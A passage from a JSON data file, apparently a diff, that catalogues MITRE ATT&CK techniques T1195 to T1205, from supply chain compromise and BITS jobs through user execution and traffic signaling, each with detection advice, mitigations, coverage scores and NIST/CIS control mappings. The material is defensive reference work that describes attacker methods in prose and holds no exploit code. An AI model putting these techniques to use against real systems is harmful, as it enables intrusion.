IBM Storwize) (Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", + "url": "https://attack.mitre.org/techniques/T1195", + "tactics": [ + "Initial Access" + ], + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1195.001", + "name": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "url": "https://attack.mitre.org/techniques/T1195/001", + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "mitigations": [ + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + } + ] + }, + { + "tid": "T1195.002", + "name": "Supply Chain Compromise: Compromise Software Supply Chain", + "url": "https://attack.mitre.org/techniques/T1195/002", + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ", + "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "mitigations": [ + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + } + ] + }, + { + "tid": "T1195.003", + "name": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "url": "https://attack.mitre.org/techniques/T1195/003", + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", + "detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + } + ], + "cumulative_score": 0.49088692387619054, + "adjusted_score": 0.49088692387619054, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "7.1,7.2,7.3,7.4,7.5,16.1,16.11,16.12,16.2,16.3,16.4,16.5,18.3,18.5" + ], + "nist_controls": [ + "CA-2", + "CA-7", + "CM-11", + "CM-7", + "RA-10", + "RA-5", + "SA-22", + "SI-2" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1197", + "name": "BITS Jobs", + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)", + "url": "https://attack.mitre.org/techniques/T1197", + "tactics": [ + "Defense Evasion", + "Persistence" + ], + "detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Network Traffic: Network Connection Creation", + "Process: Process Creation", + "Service: Service Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.9571591017771427, + "adjusted_score": 0.9571591017771427, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.2,4.4,4.5,4.7,5.3,5.4,6.1,6.2,6.8,13.4,18.2,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "SC-7", + "SI-10", + "SI-15", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1199", + "name": "Trusted Relationship", + "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)", + "url": "https://attack.mitre.org/techniques/T1199", + "tactics": [ + "Initial Access" + ], + "detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.", + "platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Logon Session: Logon Session Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "cumulative_score": 0.34567619047619047, + "adjusted_score": 0.34567619047619047, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "3.12,4.1,4.4,12.2,12.8,15.7" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "AC-6", + "AC-8", + "CM-6", + "CM-7", + "SC-46", + "SC-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1200", + "name": "Hardware Additions", + "description": "Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.", + "url": "https://attack.mitre.org/techniques/T1200", + "tactics": [ + "Initial Access" + ], + "detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ], + "cumulative_score": 0.4189969226457143, + "adjusted_score": 0.4189969226457143, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "1.1,1.2,1.4,4.1,4.2,12.2,12.6,13.9" + ], + "nist_controls": [ + "AC-20", + "AC-3", + "AC-6", + "MP-7", + "SC-41" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1201", + "name": "Password Policy Discovery", + "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).", + "url": "https://attack.mitre.org/techniques/T1201", + "tactics": [ + "Discovery" + ], + "detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "User Account: User Account Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "cumulative_score": 0.29405741793523804, + "adjusted_score": 0.29405741793523804, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [ + "CA-7", + "CM-2", + "CM-6", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1202", + "name": "Indirect Command Execution", + "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", + "url": "https://attack.mitre.org/techniques/T1202", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.32409711123238094, + "adjusted_score": 0.32409711123238094, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1203", + "name": "Exploitation for Client Execution", + "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", + "url": "https://attack.mitre.org/techniques/T1203", + "tactics": [ + "Execution" + ], + "detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ], + "cumulative_score": 0.8208773731695237, + "adjusted_score": 0.8208773731695237, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [ + "AC-4", + "AC-6", + "CA-7", + "CM-8", + "SC-18", + "SC-2", + "SC-29", + "SC-3", + "SC-30", + "SC-39", + "SC-44", + "SC-7", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1204", + "name": "User Execution", + "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", + "url": "https://attack.mitre.org/techniques/T1204", + "tactics": [ + "Execution" + ], + "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "platforms": [ + "Containers", + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "Container: Container Creation", + "Container: Container Start", + "File: File Creation", + "Image: Image Creation", + "Instance: Instance Creation", + "Instance: Instance Start", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1204.001", + "name": "User Execution: Malicious Link", + "url": "https://attack.mitre.org/techniques/T1204/001", + "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", + "detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1204.002", + "name": "User Execution: Malicious File", + "url": "https://attack.mitre.org/techniques/T1204/002", + "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", + "detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1204.003", + "name": "User Execution: Malicious Image", + "url": "https://attack.mitre.org/techniques/T1204/003", + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 2.350765942613333, + "adjusted_score": 2.350765942613333, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-44", + "SC-7", + "SI-10", + "SI-2", + "SI-3", + "SI-4", + "SI-7", + "SI-8" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1205", + "name": "Traffic Signaling", + "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)", + "url": "https://attack.mitre.org/techniques/T1205", + "tactics": [ + "Command And Control", + "Defense Evasion", + "Persistence" + ], + "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\n\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)", + "platforms": [ + "Linux", + "Network", 